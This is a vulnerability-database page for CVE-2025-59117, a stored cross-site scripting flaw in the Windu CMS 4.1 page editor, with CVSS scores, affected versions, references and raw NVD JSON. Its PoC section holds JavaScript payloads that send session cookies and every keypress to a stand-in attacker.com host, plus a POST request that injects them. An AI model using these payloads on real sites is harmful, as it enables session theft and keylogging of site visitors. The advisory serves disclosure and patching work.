Security Vulnerability Report
CVE-2025-59117 CVSS 4.8 MEDIUM

CVE-2025-59117

Published: 2025-11-18 15:16:34
Last Modified: 2025-12-05 13:16:05

Description

Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. This vulnerability can be exploited by a privileged user and may target users with higher privileges. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE
Windu CMS 4.1 < build 2250

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-59117 PoC - Windu CMS Stored XSS
// Target: Windu CMS 4.1 (windu/admin/content/pages/edit/)

// 1. Log in to the Windu CMS admin panel with a high-privilege account
// 2. Navigate to: /windu/admin/content/pages/edit/
// 3. In the page content field, inject the XSS payload:
const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';
// 4. Save the page
// 5. When any user visits the affected page, the script executes

// Example exploitation with cookie stealing:
const exploitCode = `
<script>
// Steal session cookies
document.write('<img src="https://attacker.com/log?cookie='+encodeURIComponent(document.cookie)+'">');
// Keylogger example
document.addEventListener('keypress', function(e) {
  fetch('https://attacker.com/log?key='+e.key);
});
</script>
`;

// POST request to inject:
fetch('/windu/admin/content/pages/edit/', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'content=' + encodeURIComponent(exploitCode) + '&save=1'
});

References

https://cert.pl/posts/2025/11/CVE-2025-59110 (Third Party Advisory)
https://windu.org (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59117", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:34.337", "lastModified": "2025-12-05T13:16:04.763", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. \nThis vulnerability can be exploited by a privileged user and may target users with higher privileges.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}